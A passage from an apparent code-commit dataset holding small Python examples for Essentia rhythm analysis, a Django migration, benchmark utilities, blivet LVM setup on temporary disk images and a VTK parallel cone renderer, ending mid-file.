plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
<commit_before><commit_msg>Add python example for RhythmTransform<commit_after>
|
import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
Add python example for RhythmTransformimport sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
<commit_before><commit_msg>Add python example for RhythmTransform<commit_after>import sys
from essentia.standard import *
from essentia import Pool
try:
input_file = sys.argv[1]
except:
print "usage:", sys.argv[0], "<input_file>"
sys.exit()
sampleRate = 22050
frameSize = 8192
hopSize = 1024
rmsFrameSize = 256
rmsHopSize = 32
loader = MonoLoader(filename=input_file, sampleRate=sampleRate)
w = Windowing(type='blackmanharris62')
spectrum = Spectrum()
melbands = MelBands(sampleRate=sampleRate, numberBands=40, lowFrequencyBound=0, highFrequencyBound=sampleRate/2)
pool = Pool()
for frame in FrameGenerator(audio=loader(), frameSize=frameSize, hopSize=hopSize, startFromZero=True):
bands = melbands(spectrum(w(frame)))
pool.add('melbands', bands)
print len(pool['melbands']), "Mel band frames"
print len(pool['melbands']) / 32, "Rhythm transform frames"
rhythmtransform = RhythmTransform(frameSize=rmsFrameSize, hopSize=rmsHopSize)
rt = rhythmtransform(pool['melbands'])
import matplotlib.pyplot as plt
plt.imshow(rt.T[:,:], aspect = 'auto')
plt.xlabel('Frames')
plt.ylabel('Rhythm Transform coefficients')
plt.show()
|
|
aac06331f2879cc8d39d5512c84da91f2832ff20
|
apps/authentication/migrations/0007_onlineuser_bio.py
|
apps/authentication/migrations/0007_onlineuser_bio.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
Add migration for bio user field
|
Add migration for bio user field
|
Python
|
mit
|
dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4
|
Add migration for bio user field
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add migration for bio user field<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
Add migration for bio user field# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add migration for bio user field<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0006_jobmail_set_true'),
]
operations = [
migrations.AddField(
model_name='onlineuser',
name='bio',
field=models.TextField(null=True, verbose_name='bio', blank=True),
preserve_default=True,
),
]
|
|
1d95063d1416f82115fa26d72d548ada0616e239
|
gensabenchmarks/go_func_utils.py
|
gensabenchmarks/go_func_utils.py
|
import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
Fix import with full path
|
Fix import with full path
|
Python
|
bsd-2-clause
|
sgubianpm/gensabench,sgubianpm/gensabench,sgubianpm/pygensa,sgubianpm/HyGSA,sgubianpm/pygensa,sgubianpm/HyGSA
|
Fix import with full path
|
import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
<commit_before><commit_msg>Fix import with full path<commit_after>
|
import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
Fix import with full pathimport sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
<commit_before><commit_msg>Fix import with full path<commit_after>import sys
import contextlib
import inspect
import gensabenchmarks.go_benchmark_functions as gbf
def goclass():
"""
Generator to get global optimization test classes/functions
defined in SciPy
"""
bench_members = inspect.getmembers(gbf, inspect.isclass)
benchmark_functions = [item for item in bench_members if
issubclass(item[1], gbf.Benchmark)]
for name, klass in benchmark_functions:
yield (name, klass)
class DummyFile(object):
def write(self, x): pass
def flush(self): pass
@contextlib.contextmanager
def nostdout():
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdout = DummyFile()
sys.stderr = DummyFile()
yield
sys.stdout = save_stdout
sys.stderr = save_stderr
|
|
ebfa9187f086cf905371f0e364aed534f535aff7
|
examples/lvm_non_linear.py
|
examples/lvm_non_linear.py
|
import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
Add an example of non-linear LV creation
|
Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.
|
Python
|
lgpl-2.1
|
vojtechtrefny/blivet,rhinstaller/blivet,jkonecny12/blivet,vpodzime/blivet,vpodzime/blivet,jkonecny12/blivet,rhinstaller/blivet,vojtechtrefny/blivet,rvykydal/blivet,AdamWill/blivet,AdamWill/blivet,rvykydal/blivet
|
Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.
|
import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
<commit_before><commit_msg>Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.<commit_after>
|
import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
<commit_before><commit_msg>Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.<commit_after>import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
|
961817824ea3d030bc2fb50a0b97f76a525ffeb9
|
Examples/ParallelProcessing/MPI/Python/ParallelCone.py
|
Examples/ParallelProcessing/MPI/Python/ParallelCone.py
|
from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
Add example of parallel processing using python
|
Add example of parallel processing using python
|
Python
|
bsd-3-clause
|
johnkit/vtk-dev,jmerkow/VTK,SimVascular/VTK,spthaolt/VTK,keithroe/vtkoptix,msmolens/VTK,cjh1/VTK,gram526/VTK,mspark93/VTK,sgh/vtk,arnaudgelas/VTK,collects/VTK,keithroe/vtkoptix,sgh/vtk,gram526/VTK,Wuteyan/VTK,sankhesh/VTK,sankhesh/VTK,keithroe/vtkoptix,aashish24/VTK-old,johnkit/vtk-dev,sankhesh/VTK,sankhesh/VTK,collects/VTK,johnkit/vtk-dev,SimVascular/VTK,gram526/VTK,msmolens/VTK,arnaudgelas/VTK,collects/VTK,candy7393/VTK,keithroe/vtkoptix,ashray/VTK-EVM,naucoin/VTKSlicerWidgets,naucoin/VTKSlicerWidgets,msmolens/VTK,jmerkow/VTK,Wuteyan/VTK,sumedhasingla/VTK,keithroe/vtkoptix,Wuteyan/VTK,collects/VTK,sankhesh/VTK,hendradarwin/VTK,spthaolt/VTK,berendkleinhaneveld/VTK,biddisco/VTK,biddisco/VTK,johnkit/vtk-dev,hendradarwin/VTK,berendkleinhaneveld/VTK,cjh1/VTK,msmolens/VTK,jeffbaumes/jeffbaumes-vtk,Wuteyan/VTK,aashish24/VTK-old,sankhesh/VTK,hendradarwin/VTK,keithroe/vtkoptix,demarle/VTK,ashray/VTK-EVM,ashray/VTK-EVM,SimVascular/VTK,spthaolt/VTK,biddisco/VTK,arnaudgelas/VTK,berendkleinhaneveld/VTK,johnkit/vtk-dev,jmerkow/VTK,jeffbaumes/jeffbaumes-vtk,jmerkow/VTK,cjh1/VTK,jmerkow/VTK,ashray/VTK-EVM,sumedhasingla/VTK,mspark93/VTK,mspark93/VTK,jeffbaumes/jeffbaumes-vtk,aashish24/VTK-old,candy7393/VTK,sankhesh/VTK,jeffbaumes/jeffbaumes-vtk,sankhesh/VTK,candy7393/VTK,sumedhasingla/VTK,arnaudgelas/VTK,naucoin/VTKSlicerWidgets,candy7393/VTK,sgh/vtk,ashray/VTK-EVM,msmolens/VTK,spthaolt/VTK,gram526/VTK,msmolens/VTK,jeffbaumes/jeffbaumes-vtk,sgh/vtk,jmerkow/VTK,ashray/VTK-EVM,berendkleinhaneveld/VTK,candy7393/VTK,gram526/VTK,sumedhasingla/VTK,cjh1/VTK,cjh1/VTK,mspark93/VTK,mspark93/VTK,keithroe/vtkoptix,SimVascular/VTK,berendkleinhaneveld/VTK,demarle/VTK,berendkleinhaneveld/VTK,sumedhasingla/VTK,sgh/vtk,naucoin/VTKSlicerWidgets,sgh/vtk,demarle/VTK,mspark93/VTK,daviddoria/PointGraphsPhase1,ashray/VTK-EVM,demarle/VTK,cjh1/VTK,johnkit/vtk-dev,mspark93/VTK,hendradarwin/VTK,johnkit/vtk-dev,jmerkow/VTK,aashish24/VTK-old,spthaolt/VTK,SimVascular/VTK,hendradarwin/VTK,demarle/VTK,jeffbaumes/jeffbaumes-vtk,sumedhasingla/VTK,demarle/VTK,biddisco/VTK,daviddoria/PointGraphsPhase1,mspark93/VTK,ashray/VTK-EVM,SimVascular/VTK,arnaudgelas/VTK,demarle/VTK,gram526/VTK,gram526/VTK,daviddoria/PointGraphsPhase1,demarle/VTK,biddisco/VTK,hendradarwin/VTK,hendradarwin/VTK,berendkleinhaneveld/VTK,Wuteyan/VTK,biddisco/VTK,collects/VTK,candy7393/VTK,SimVascular/VTK,daviddoria/PointGraphsPhase1,candy7393/VTK,candy7393/VTK,sumedhasingla/VTK,SimVascular/VTK,msmolens/VTK,keithroe/vtkoptix,Wuteyan/VTK,naucoin/VTKSlicerWidgets,Wuteyan/VTK,biddisco/VTK,aashish24/VTK-old,daviddoria/PointGraphsPhase1,arnaudgelas/VTK,sumedhasingla/VTK,naucoin/VTKSlicerWidgets,gram526/VTK,spthaolt/VTK,msmolens/VTK,spthaolt/VTK,aashish24/VTK-old,daviddoria/PointGraphsPhase1,jmerkow/VTK,collects/VTK
|
Add example of parallel processing using python
|
from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
<commit_before><commit_msg>Add example of parallel processing using python<commit_after>
|
from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
Add example of parallel processing using pythonfrom vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
